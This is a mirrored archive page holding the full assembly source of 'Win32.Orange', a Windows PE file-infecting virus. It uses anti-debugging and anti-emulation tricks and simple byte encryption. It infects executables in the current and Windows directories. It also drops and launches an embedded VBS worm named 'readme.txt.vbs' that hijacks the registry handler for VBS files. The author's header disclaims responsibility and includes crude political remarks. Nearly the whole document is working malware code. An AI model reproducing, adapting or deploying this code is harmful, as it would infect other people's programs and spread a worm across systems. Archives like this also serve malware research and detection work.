Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
464e532a4b
vxug-MalwareSourceCode/Win32/Win32.Orange.asm
vxunderground e6e7892f53
Add files via upload
2020-10-10 22:09:34 -05:00

1038 lines
25 KiB
NASM
Raw Blame History

;
; -Greetz to all 29Aerz,and iKX'erz-
;
; Win32.Orange [created by Ebola] paired with VBS/Orange2
;
; Type: Win32 PE infector
; Size: Approx 3.0KB
; Encrypted: Yes (1 layer)
; Polymorphic: No
; Optimized: Yes, CRC api's and somewhat optimized opcodes (damn I need lessons from Super/29A:)
; Payload: None, but drops a VBS virus.
; Misc. Features: Drops a VBS virus file and executes it. Several Anti-Debug,Anti-Emu features
; and last it uses lots of SEH
; Infections: All files in current directory and 13 files in the windows directory.
;
; Alright I believe this is my 2nd win32 virus release, my first one is zipped up with a
; password that I don't remember :). Anyway, this direct infector infects all files in current
; directory and 13 files in windows directory. It drops a VBS/Virus (VBS/Orange2).
;
; What's next? Probably gonna make a worm in win32asm.. :))
;
; Feelings (huh? I have no idea:)
;
; Even if you don't live in the U.S., I feel very vehement about what Bin Laden did
; to our country. I know everyone has their own opinions and I respect those opinions
; and I don't want to get into a little political war about how unfair the U.S. can
; be to other countries, but I think his billionaire ass should burn in hell. Speekin
; of BILLionaire ass, I will not be held responsible for any damages or any havoc that
; this software causes to any systems. I do not condone nor allow spreading of viruses
; so by spreading this virus you are involving yourself into the legal system and I will
; not go to court and support you.. In other words, I hold absolutely no responsibility
; towards this software and I only support beta testing. I made this out of experimentation
; on my computer and if you cause worldwide computer failure, I don't care - It's your
; fault, It's your bad, I have ABSOLUTELY NOTHING TO DO WITHIT!!!
;
; Okay, enough rambling, on with the source code, enjoy if you wish
;
; ONE MORE THING: Macro Assembler is the only good software M$ has ever made (AGAIN, NO
; POLITICAL BATTLES PLEASE.. :)
;
;** To be compiled with Masm 6.0: Check win32asm.cjb.net
;** Order of PUSHAD: (E)AX [1Ch], (E)CX [18h], (E)DX [14h], (E)BX [10h], (E)SP [0Ch], (E)BP [8h], (E)SI [4h], (E)DI [0h]
.386p
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
@Delta_Handle MACRO
call markit
markit:
pop ebp
sub ebp,offset markit
ENDM
OS_WIN98 equ 1
OS_WINNT equ 2
.code
start:
virus_start = $
pushad
ASSUME FS: nothing
;** kill off some debuggers
call setupseh
mov esp,[esp+08h]
jmp fin
setupseh:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
xor eax,eax
mov dword ptr [eax],00h ; BAM!
fin:
xor edx,edx
pop dword ptr fs:[edx] ;** clear up the stack
pop edx
;** should be zero
mov ecx,fs:[20]
jecxz choker
;** locks em up all the time, muahaha
cli
jmp $-1
choker:
popad
;** First we must get the delta to access our data
@Delta_Handle
or ebp,ebp
jz monkey
mov esi,monkey
add esi,ebp
mov ecx,virus_end-monkey
push esi
pop edi
decrypt:
lodsb
not al ;not al
stosb
dec ecx
jecxz monkey
jmp decrypt
monkey = $
;** Next we find the kernel in memory
mov eax,[esp]
and eax,0FFFF0000h ; Just get the 32bit high word
loopgetkern:
sub eax,1000h ; Surf throught the pages
mov bx,word ptr [eax]
not bx ; protect from having 'MZ' in our code
cmp bx,not 'ZM' ; and check for a MZ header
jnz loopgetkern ; no, we keep checking
mov [ebp+kernel],eax
ring3:
xchg eax,ebx ;** silly anti-emu
mov ebx,ds ;aahh i love it
push ebx
pop ds ; playing with ds is surefire to throw something off
xchg eax,ebx
;** Find our current OS that we're on (NOTE: this may not work on WinME, i am not sure)
; works with Win98, Win95, WinNT, Win2000 though
; Taken from Billy Belcebu's great and huge virus writing guide, thanx billy!
mov ecx,cs
xor cl,cl
jecxz wNT
mov [ebp+CurrentOS],OS_WIN98
jmp prepare
wNT:
mov [ebp+CurrentOS],OS_WINNT
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
; OK, we have our OS down, next we find our API's
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
prepare:
mov esi,[ebp+kernel]
mov ebx,esi
mov esi,[esi+03ch]
add esi,ebx
mov ax,word ptr [esi]
not ax ; again, hide the 'PE' in the file as AV looks for this
cmp ax,not "EP" ; check for valid PE file
jnz no_kernel
add esi,78h ; Get to exports address
mov esi,[esi] ; go there
add esi,ebx
lea edi,[ebp+NumberOfNames] ; we are going to get info from exports table
add esi,018h
lodsd ; Get number of names,
stosd ; store it.
lodsd ; Get RVA of addresses,
stosd ; store it.
lodsd ; Get RVA of Names,
stosd ; store it.
lodsd ; Get RVA of Ordinals,
stosd ; store it.
; total 8 bytes :) usually takes alot more
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
; Locate our API's ****
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
lea esi,[ebp+CRC32_PROC]
mov ecx,[esi]
lea edi,[ebp+GetProcAddress]
loop_getem:
call Get_APICRC32
stosd
add esi,4
mov ecx,[esi]
jecxz done_finding_api
jmp loop_getem
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
;** Next we do some more tricks to get rid of
; debuggers or emulators
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
done_finding_api:
call dword ptr [ebp+IsDebuggerPresent] ; find application level debuggers
jz proceed ; none, proceed to SoftICE
; Put anti debug stuff here
cli
jmp $-1 ; hang the damn bitches
proceed:
call CheckSoftICE ; checks if SoftICE for 95/98/NT is in memory
or eax,eax ; check EAX
jz LoadingSequence ; load it up :)
jmp leaveth ; SoftICE detected, we're outta here
jmp LoadingSequence
;** Check for softice presence
CheckSoftICE:
push 00h
push 80h
push 03h
push 00h
push 01h
push 0c0000000h
lea esi,[ebp+SoftICE_Win9X]
push esi
call [ebp+CreateFileA]
inc eax
jnz si9x ; SoftICE for Win9X is active
dec eax
push eax
call [ebp+CloseHandle]
;--- check for NTice
push 00h
push 80h
push 03h
push 00h
push 01h
push 0c0000000h
lea esi,[ebp+SoftICE_WinNT]
push esi
call [ebp+CreateFileA]
inc eax
jnz siNT ; SoftICE for WinNT is active
dec eax
push eax
call [ebp+CloseHandle]
xor eax,eax
ret
si9x:
mov eax,01h ; SI for Win95/98
ret
siNT:
mov eax,02h ; for NT/2000
ret
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
;** Loading of virus components
Inf32_Counter dd 0
NumPasses dd 0
LoadingSequence:
dec dword ptr [ebp+Inf32_Counter] ; FFFFFFFF infections: basically every file
mov [ebp+NumPasses],2 ; 1st pass: curdir 2nd: windir
infpass:
;** Setup an SEH handler to protect our infection routine
call SetupSEH
mov esp,[esp+08h]
jmp DoneSEH
SetupSEH:
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
;+-+-+-+-+-+-+-+-+-+-+-
lea edi,[ebp+FindData]
push edi
lea eax,[ebp+FileMask]
push eax
call [ebp+FindFirstFileA] ; find the first file...
inc eax
jz leaveth
dec eax
mov ebx,eax
infect: push ebx ; save findhandle
push dword ptr [edi+20h] ; push the filesize
add edi,02Ch ; point to filename and..
push edi ; push
call InfectFile ; Infect the file!
pop ebx ; restore FindHandle (we modify EBX)
dec dword ptr [ebp+Inf32_Counter]
jz __next
lea edi,[ebp+FindData] ; re-initialize EDI
push edi
add edi,02Ch ; clear filename field (so no overwriting is done)
xor al,al
mov ecx,256
rep stosb
mov edi,[esp] ; restore EDI
push ebx ; find the next valid file
call [ebp+FindNextFileA]
or eax,eax
jnz infect
push ebx
call [ebp+FindClose]
;+-+-+-+-+-+-+-+-+-+-+-
DoneSEH:
xor eax,eax
pop dword ptr fs:[eax]
pop eax
__next:
dec dword ptr [ebp+NumPasses]
jz weredone
push 128
lea edi,[ebp+Buffer]
push edi
call [ebp+GetWindowsDirectoryA]
push edi
call [ebp+SetCurrentDirectoryA]
mov [ebp+Inf32_Counter],13
jmp infpass
weredone:
call InstallVBS ; extract the VBS file to the current directory
jmp leaveth
;********BEGINNING OF INFECTOR***************
InfectFile:
pop eax ; return address
pop esi ; file name
pop ecx ; file size
; pop edx ; file attribs
mov [ebp+addr_ret],eax
mov [ebp+filename],esi
mov [ebp+file_size],ecx
; mov [ebp+file_attr],edx
;save the old entry point and imagebase
mov ebx,[ebp+ImageBase]
mov [ebp+ib],ebx
mov ebx,[ebp+OldEIP]
mov [ebp+oe],ebx
;**--**
push ecx ; save it
push 080h ; wipe attributes off
push esi
call [ebp+SetFileAttributesA]
call Open ; i dont even bother checking if its valid, we find out after
mov ecx,[esp] ; it has been mapped
xchg eax,ebx
call GenMap ; map it in memory
xchg eax,ebx
mov ecx,[esp]
call MapIt
pop ecx
or eax,eax
jz close
cmp word ptr [eax],'ZM' ; is it a valid exe?
jnz close
mov esi,eax
mov esi,[esi+03ch] ; get to pe header
add esi,eax
cmp word ptr [esi],'EP' ; is it a PE/exe?
jnz close
cmp dword ptr [esi+04Ch],77661212h ; are we infected?
jz close
push dword ptr [esi+03Ch] ; save file alignment
call CLOSEPROC ; close file
mov eax,[ebp+file_size] ; put old size in eax
pop ecx
add eax,virus_end-virus_start ; make it the new size
call Factor ; factor it into the alignment
mov [ebp+file_size],eax ; store it again
xchg ecx,eax
push ecx
mov esi,[ebp+filename] ; reopen etc....
call Open
xchg eax,ebx
mov ecx,[esp]
call GenMap
xchg eax,ebx
mov ecx,[esp]
call MapIt
pop ecx
or eax,eax ; check make sure its valid
jz close
; proceed infection
mov esi,eax
push esi
pop ebx
mov esi,[esi+03ch]
add esi,ebx
movzx eax,word ptr [esi+06h] ; number of sections
dec eax ; - 1
imul eax,eax,28h ; gets us to last section
mov ebx,esi
add esi,78h+(8*10h) ; blah..
add esi,eax
or dword ptr [esi+24h],0a0000020h ; code,readable,writable
mov ecx,[esi+10h]
push ecx
mov edx,[esi+14h]
mov eax,[esi+0Ch]
add eax,ecx
mov edx,[ebx+28h] ; Old EIP
mov [ebp+OldEIP],edx
mov edx,[ebx+34h] ; image base
mov [ebp+ImageBase],edx
mov [ebx+28h],eax ; the new eip is stored
mov eax,ecx
add eax,virus_end-virus_start
mov ecx,[ebx+03Ch]
call Factor
mov [esi+10h],eax ; set the new sizes, this is physical size
mov [esi+08h],eax ; virtual size
mov edx,eax
mov ebx,[ebp+MappedView] ; need a handle again
mov edi,[esi+14h] ; Pointer to Raw Data (in PE header)
add edi,ebx ; point it to the end of the file (to write our virus)
pop ecx ; size of last section
add edi,ecx ; point to the end of last section
push esi ; save ESI
lea esi,[ebp+virus_start] ; ... you should know this :)
mov ecx,virus_end-virus_start ; setup the length of the virus
push ecx
rep movsb ; copy the virus there!
pop ecx
sub ecx,monkey-virus_start
sub edi,ecx
mov esi,edi
encrypt:
lodsb
not al
stosb
dec ecx
jecxz @bbcr
jmp encrypt
@bbcr:
pop esi ; restore ESI
mov eax,ebx ; fix it to point to PE header
mov ebx,[ebx+03Ch] ; e_lfanew
add ebx,eax ; normalize
mov eax,[esi+0Ch] ; VA address of last section
add eax,edx ; add our new length
mov [ebx+50h],eax ; and we have size of image
mov dword ptr [ebx+04Ch],77661212h ; mark it as infected
;** next we restore old image base and entrypoint
mov ebx,[ebp+ib]
mov eax,[ebp+oe]
mov [ebp+ImageBase],ebx
mov [ebp+OldEIP],eax
;**--**
close:
call CLOSEPROC
jmp setattr
setattr:
push dword ptr [ebp+file_attr]
push dword ptr [ebp+filename]
call [ebp+SetFileAttributesA]
exit_inf:
push [ebp+addr_ret]
ret
;***********************************************
; Infectors data, i just keep it in the proc
;***********************************************
dataset:
addr_ret dd 0
file_size dd 0
file_attr dd 80h
FileHandle dd 0
MappedFile dd 0
MappedView dd 0
filename dd 0
ib dd 0
oe dd 0
;***********************************************
; Infectors helper functions
;***********************************************
Factor:
pushad
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
mov [esp+01Ch],eax
popad
ret
CLOSEPROC:
push dword ptr [ebp+MappedView]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+MappedFile]
call [ebp+CloseHandle]
push dword ptr [ebp+FileHandle]
call [ebp+CloseHandle]
ret
;** open file for read/write ESI = FileName
Open:
xor eax,eax
push eax
push eax
push 3h
push eax
push 1h
push 0C0000000h
push esi
call [ebp+CreateFileA]
mov [ebp+FileHandle],eax
ret
; ECX=Size EBX=FileHandle
GenMap:
xor eax,eax
push eax
push ecx
push eax
push 04h
push eax
push ebx
call [ebp+CreateFileMappingA]
mov [ebp+MappedFile],eax
ret
; ECX=Size EBX=Handle returned by GenMap
MapIt:
xor eax,eax
push ecx
push eax
push eax
push 02h
push ebx
call [ebp+MapViewOfFile]
mov [ebp+MappedView],eax
ret
;*********END OF INFECTOR****************
InstallVBS proc
lea esi,[ebp+vbsfile]
xor eax,eax
push eax
push eax
inc eax
push eax
dec eax
push eax
inc eax
push eax
push 0c0000000h
push esi
call [ebp+CreateFileA]
mov [ebp+FileHandle],eax
push eax
lea edi,[ebp+Buffer]
push 00h
push edi
push dword ptr [ebp+sizevbs]
lea esi,[ebp+vbsdata]
push esi
push eax
call [ebp+WriteFile]
call [ebp+CloseHandle]
;############################
lea esi,[ebp+_Shell32]
push esi
call [ebp+LoadLibraryA]
push eax
lea esi,[ebp+_ShellExecute]
push esi
push eax
call [ebp+GetProcAddress]
push 01h
push 00h
push 00h
lea esi,[ebp+vbsfile]
push esi
lea esi,[ebp+_OpenExecute]
push esi
push 00h
call eax
call [ebp+FreeLibrary]
;############################
ret
InstallVBS endp
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
;** Leave
no_kernel:
leaveth:
or ebp,ebp
jz firstgeneration
mov eax,00400000h
ImageBase equ $-4
add eax,00001000h
OldEIP equ $-4
jmp eax
firstgeneration:
push 0
call [ebp+ExitProcess]
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
;** Error handling and must-exit thingy's
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
;---------------------------------------
; Different functions we use *******
;---------------------------------------
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi ; 1 byte less
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
CRC32 endp
;** Finds api address via CRC32 of Api name
; portions of this code used from Billy Belcebu's win32 viruswriting guide
; thanx billy :)
; expects ecx to be crc32 of api, ebx to be kernel base
Get_APICRC32 PROC
pushad ; save all of the registers - required...
mov edx,[ebp+ExportNameRVA] ; open the export table
add edx,ebx
mov edi,[edx]
add edi,ebx
and dword ptr [ebp+ExportCounter],00h ; clear the counter
loop_check_crc: ; Soma this code was taken from billy belcebu's guide to virus writing for win32
mov esi,edi ; save edi in esi
xor al,al ; find the length
scasb
jnz $-1
sub edi,esi ; .. solve it
pushad ; save all regs
push ecx ; save ecx as it is important
call CRC32
pop ecx ; restore ecx
cmp eax,ecx ; compare the two CRC32's
jnz next_api ; no match
popad ; a match, restore regs and find the address
jmp found
next_api:
popad ; restore the regs
inc dword ptr [ebp+ExportCounter] ; increase counter
add edx,4
mov edi,[edx]
add edi,ebx
jmp loop_check_crc ; all over a gain
found:
xor eax,eax ; clear eax
mov eax,dword ptr [ebp+ExportCounter] ; put the counter in it
mov esi,[ebp+ExportOrdinalRVA] ; put the ordinal RVA...
shl eax,1
add esi,eax
add esi,ebx ; ok now we get the ordinal
lodsw ; we have it
shl ax,2 ; Ordinal*4+KernelBase+AddressOfAddy's equals /
; pointer to function address!
mov esi,[ebp+ExportAddressRVA]
add esi,ebx
add esi,eax
lodsd ; get the data pointed to
add eax,ebx ; normalize by kernel
mov [ebp+save],eax ; save it for we restore all registers now
popad ; restore'em
mov eax,[ebp+save] ; put into eax
ret ; and return with our new found addy
save dd 0
Get_APICRC32 endp
;----------------------------------------
; The VBS/Worm
;----------------------------------------
_OpenExecute db "open",0
_ShellExecute db "ShellExecuteA",0
_Shell32 db "Shell32.dll",0
vbsfile db "readme.txt.vbs",0
vbsdata db 67,97,108,108,32,118,98,115,78,101,99,116,111,114,13,10
db 87,83,99,114,105,112,116,46,113,117,105,116,13,10,39,13
db 10,83,117,98,32,118,98,115,78,101,99,116,111,114,40,41
db 13,10,68,105,109,32,118,105,13,10,13,10,83,101,116,32
db 115,32,61,32,87,83,99,114,105,112,116,46,65,114,103,117
db 109,101,110,116,115,13,10,83,101,116,32,111,98,106,83,104
db 101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101
db 99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108
db 108,34,41,13,10,83,101,116,32,102,115,32,61,32,67,114
db 101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105
db 112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109
db 79,98,106,101,99,116,34,41,13,10,77,121,115,99,114,105
db 112,116,32,61,32,87,83,99,114,105,112,116,46,83,99,114
db 105,112,116,70,117,108,108,78,97,109,101,13,10,83,101,116
db 32,102,32,61,32,102,115,46,111,112,101,110,116,101,120,116
db 102,105,108,101,40,77,121,115,99,114,105,112,116,44,49,41
db 13,10,118,105,114,32,61,32,102,46,82,101,97,100,65,108
db 108,13,10,102,46,99,108,111,115,101,13,10,83,101,116,32
db 102,32,61,32,78,111,116,104,105,110,103,13,10,73,102,32
db 73,110,83,116,114,40,49,44,76,67,97,115,101,40,77,121
db 115,99,114,105,112,116,41,44,34,114,101,97,100,109,101,46
db 116,120,116,46,118,98,115,34,44,49,41,32,84,104,101,110
db 13,10,111,98,106,83,104,101,108,108,46,82,101,103,87,114
db 105,116,101,32,34,72,75,69,89,95,67,76,65,83,83,69
db 83,95,82,79,79,84,92,86,66,83,70,105,108,101,92,83
db 104,101,108,108,92,79,112,101,110,92,67,111,109,109,97,110
db 100,92,34,44,102,115,46,71,101,116,83,112,101,99,105,97
db 108,70,111,108,100,101,114,40,48,41,32,43,32,34,92,87
db 83,99,114,105,112,116,46,69,88,69,32,34,32,43,32,77
db 121,115,99,114,105,112,116,32,43,32,34,32,37,49,32,34
db 32,43,32,67,104,114,40,51,52,41,32,43,32,102,115,46
db 71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114
db 40,48,41,32,43,32,34,92,87,83,99,114,105,112,116,46
db 69,88,69,32,34,32,43,32,67,104,114,40,51,52,41,32
db 43,32,34,37,49,34,32,43,32,67,104,114,40,51,52,41
db 32,43,32,34,32,37,42,34,32,43,32,67,104,114,40,51
db 52,41,13,10,69,110,100,32,73,102,13,10,13,10,73,102
db 32,115,46,67,111,117,110,116,32,62,32,49,32,84,104,101
db 110,13,10,9,9,83,101,116,32,102,32,61,32,102,115,46
db 111,112,101,110,116,101,120,116,102,105,108,101,40,115,40,48
db 41,44,49,41,13,10,9,9,118,105,32,61,32,102,46,82
db 101,97,100,65,108,108,13,10,9,9,102,46,99,108,111,115
db 101,13,10,9,9,83,101,116,32,102,32,61,32,78,111,116
db 104,105,110,103,13,10,13,10,9,9,83,101,116,32,102,32
db 61,32,102,115,46,99,114,101,97,116,101,116,101,120,116,102
db 105,108,101,40,34,36,116,116,121,107,36,46,118,98,95,34
db 41,13,10,9,13,10,9,9,73,102,32,73,110,83,116,114
db 40,49,44,118,105,44,34,118,98,115,78,101,99,116,111,114
db 34,44,49,41,32,84,104,101,110,13,10,9,9,9,69,120
db 105,116,32,83,117,98,13,10,9,9,69,110,100,32,73,102
db 13,10,9,13,10,9,9,110,116,116,32,61,32,73,110,83
db 116,114,40,49,44,118,105,114,44,34,39,34,44,49,41,13
db 10,9,13,10,9,9,102,46,119,114,105,116,101,32,34,99
db 97,108,108,32,118,98,115,78,101,99,116,111,114,34,32,43
db 32,118,98,67,114,76,102,13,10,9,9,102,46,119,114,105
db 116,101,32,118,105,32,43,32,118,98,67,114,76,102,13,10
db 9,9,102,46,119,114,105,116,101,32,77,105,100,40,118,105
db 114,44,110,116,116,44,76,101,110,40,118,105,114,41,45,110
db 116,116,41,13,10,9,9,9,13,10,9,9,102,46,99,108
db 111,115,101,13,10,9,9,83,101,116,32,102,32,61,32,78
db 111,116,104,105,110,103,13,10,9,13,10,9,9,111,98,106
db 83,104,101,108,108,46,82,117,110,32,115,40,49,41,13,10
db 9,9,102,115,46,67,111,112,121,70,105,108,101,32,34,36
db 116,116,121,107,36,46,118,98,95,34,44,115,40,48,41,13
db 10,69,110,100,32,73,102,13,10,69,110,100,32,83,117,98
db 13,10
sizevbs dd 1042d
;----------------------------------------
; Different data we use ************
;----------------------------------------
CRC32_PROC dd 0FFC97C1Fh ; GetProcAddress
dd 04134D1ADh ; LoadLibraryA
dd 019F33607h ; CreateThread
dd 0AFDF191Fh ; FreeLibrary
dd 08C892DDFh ; CreateFileA
dd 0797B49ECh ; MapViewOfFile
dd 094524B42h ; UnmapViewOfFile
dd 096B2D96Ch ; CreateFileMappingA
dd 068624A9Dh ; CloseHandle
dd 0AE17EBEFh ; FindFirstFileA
dd 0AA700106h ; FindNextFileA
dd 0C200BE21h ; FindClose
dd 0FE248274h ; GetWindowsDirectoryA
dd 0593AE7CEh ; GetSystemDirectoryA
dd 0B2DBD7DCh ; SetCurrentDirectoryA
dd 0EBC6C18Bh ; GetCurrentDirectoryA
dd 0C38969C7h ; SetPriorityClass
dd 085859D42h ; SetFilePointer
dd 059994ED6h ; SetEndOfFile
dd 0C633D3DEh ; GetFileAttributesA
dd 03C19E536h ; SetFileAttributesA
dd 0EF7D811Bh ; GetFileSize
dd 0B99F1B1Eh ; GetDriveTypeA
dd 083A353C3h ; GlobalAlloc
dd 05CDF6B6Ah ; GlobalFree
dd 02E12ADB5h ; GlobalLock
dd 088BC746Eh ; GlobalUnlock
dd 052E3BEB1h ; IsDebuggerPresent
dd 0613FD7BAh ; GetTickCount
dd 0058F9201h ; ExitThread
dd 0D4540229h ; WaitForSingleObject
dd 040F57181h ; ExitProcess
dd 00AC136BAh ; Sleep
dd 021777793h ; WriteFile
dd 004DCF392h ; GetModuleFileNameA
dd 05BD05DB1h ; CopyFileA
dd 000000000h ; done mark.
; NumFunctions equ ($-CRC32_PROC)/4
GetProcAddress dd 0 ; GetProcAddress
LoadLibraryA dd 0 ; LoadLibraryA
CreateThread dd 0 ; CreateThread
FreeLibrary dd 0 ; FreeLibrary
CreateFileA dd 0 ; CreateFileA
MapViewOfFile dd 0 ; MapViewOfFile
UnmapViewOfFile dd 0 ; UnmapViewOfFile
CreateFileMappingA dd 0 ; CreateFileMappingA
CloseHandle dd 0 ; CloseHandle
FindFirstFileA dd 0 ; FindFirstFileA
FindNextFileA dd 0 ; FindNextFileA
FindClose dd 0 ; FindClose
GetWindowsDirectoryA dd 0 ; GetWindowsDirectoryA
GetSystemDirectoryA dd 0 ; GetSystemDirectoryA
SetCurrentDirectoryA dd 0 ; SetCurrentDirectoryA
GetCurrentDirectoryA dd 0 ; GetCurrentDirectoryA
SetPriorityClass dd 0 ; SetPriorityClass
SetFilePointer dd 0 ; SetFilePointer
SetEndOfFile dd 0 ; SetEndOfFile
GetFileAttributesA dd 0 ; GetFileAttributesA
SetFileAttributesA dd 0 ; SetFileAttributesA
GetFileSize dd 0 ; GetFileSize
GetDriveTypeA dd 0 ; GetDriveTypeA
GlobalAlloc dd 0 ; GlobalAlloc
GlobalFree dd 0 ; GlobalFree
GlobalLock dd 0 ; GlobalLock
GlobalUnlock dd 0 ; GlobalUnlock
IsDebuggerPresent dd 0 ; IsDebuggerPresent
GetTickCount dd 0 ; GetTickCount
ExitThread dd 0 ; ExitThread
WaitForSingleObject dd 0 ; WaitForSingleObject
ExitProcess dd 0 ; ExitProcess
Sleep dd 0 ; sleep
WriteFile dd 0
GetModuleFileNameA dd 0
CopyFileA dd 0
CurrentProc dd 0
TempName db 32 dup(0)
CurrentOS db 0
kernel dd 0
;** Used while searching for exports
NumberOfNames dd 0
ExportAddressRVA dd 0
ExportNameRVA dd 0
ExportOrdinalRVA dd 0
ExportCounter dd 0
;** Anti debugging etc
SoftICE_Win9X db "\\.\SICE",0
SoftICE_WinNT db "\\.\NTICE",0
;** Various
Buffer db 128 dup(0) ; current directory
Windows db 128 dup(0)
DirSize equ 128
FindData WIN32_FIND_DATA <0>
;** Hyper infection
DriveRoot db "c:\",0
FileMask db "*.exe",0
;** Misc useless shit
Signature db "[Win32.Orange by Ebola]",0
misc1 db "Dedicated to the NYFD and NYPD.",0
virus_end = $
end start
View Git Blame Copy Permalink